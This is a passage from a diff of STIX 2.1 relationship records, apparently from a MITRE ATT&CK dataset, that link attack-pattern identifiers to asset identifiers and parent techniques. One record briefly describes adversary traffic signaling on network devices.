"x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5c0ecb0a-f08b-4399-80b3-f97821cb0f5a", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5c15adbf-3aff-4641-b4e6-d48ab446dc43", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5c1a4e36-0755-43e6-8ad6-644d0371f953", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5c1b40be-def9-4cfe-9138-8054ea86da6c", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5c2189e7-8d6b-4d29-8ecb-48bcd7f9c217", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5c3c9a95-98ee-4f60-8291-c4c34347adb6", + "created": "2020-03-19T18:17:25.951Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c0a384a4-9a25-40e1-97b6-458388474bc8", + "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5c61c8a2-bfff-43fb-8397-bff864413d74", + "created": "2023-09-29T17:06:09.673Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:06:09.673Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5c7cbe43-04ec-4a2e-a365-dbbbb17fff0f", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5c9c1033-c04f-458b-95a1-034f15d8b48f", + "created": "2024-06-27T09:39:04.424Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:39:04.424Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5caf134d-1c4d-48c4-b6c0-d23d9ca28809", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5cc8aab6-8697-4277-8a12-290bfd15705d", + "created": "2020-10-01T00:40:45.362Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ccd1894-824e-4cee-b942-ae6d22dea547", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5cd609ef-0438-489b-9ae8-4edafb1a627b", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5cea32ec-cd93-4618-a2df-3c3752da3ef6", + "created": "2024-06-26T14:28:46.786Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:28:46.786Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5cf7ca1b-9223-43e3-9d21-49940c34c724", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5cfc76c2-e348-42ad-bd2e-78aed946ff4f", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5d12baa8-7a9b-47e5-9bd7-1df03227d439", + "created": "2024-06-26T15:39:50.378Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:39:50.378Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5d136582-cf13-4b15-886e-3f3a1bb23c3f", + "created": "2024-06-27T08:49:25.932Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:49:25.932Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5d3f8c86-a062-4ccc-bc0f-73a6727f543d", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5d5317e7-5052-4e23-a0dc-462d8133d7a4", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5d5c5fb1-27f8-484a-9af4-13efda5867dc", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5d6e8b05-5042-469e-8d98-b51e7b97fde6", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5d6f0f0e-7479-480a-aaef-92a3e8d8b7c8", + "created": "2020-03-06T21:04:12.593Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", + "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5d70cfdd-3bd1-4198-8e3e-8bdbce896d2a", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5da295a0-ca08-4846-bbb1-cb9d65ded096", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5da5b7d6-19d5-437b-a6f3-fa51f6f1ead3", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5da7d645-4ec6-45b3-bd60-366a2e70292d", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5dac8241-03f9-4ae2-8549-c8298ba3a149", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5db6d0f0-225d-4a66-90c0-46b085090daa", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5dcd5aa6-e485-4468-80b7-5964c49d09dc", + "created": "2024-05-22T17:09:23.607Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:17:40.287Z", + "description": "Asset Mapping Rationale: Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. On network devices, adversaries may use crafted packets to enable Network Device Authentication for standard services offered by the device such as telnet.", + "relationship_type": "targets", + "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ddc3b3e-78f8-4885-833a-67d902823197", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5de1e8b8-9aa9-4df9-9584-5e5f75da8432", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5deb9b0f-0cf1-4c52-8fc1-df66fc40702f", + "created": "2024-06-26T13:48:18.720Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:48:18.720Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5dedb236-b37b-4e6b-bd3d-a09ddc1e9c17", + "created": "2021-06-03T18:44:29.898Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", + "target_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5dee98fe-6c97-4ade-9f07-de278412d4fa", + "created": "2024-06-27T09:26:23.834Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:26:23.834Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5e110d34-8b3e-4037-9418-17ec73583258", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5e2820f8-038d-47f9-af24-7f26af185969", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5e324da5-0fee-4dac-b289-410d560e03e9", + "created": "2023-09-28T19:46:49.255Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:46:49.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5e35275e-bd18-478c-83ab-d5876b0c9c9f", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": 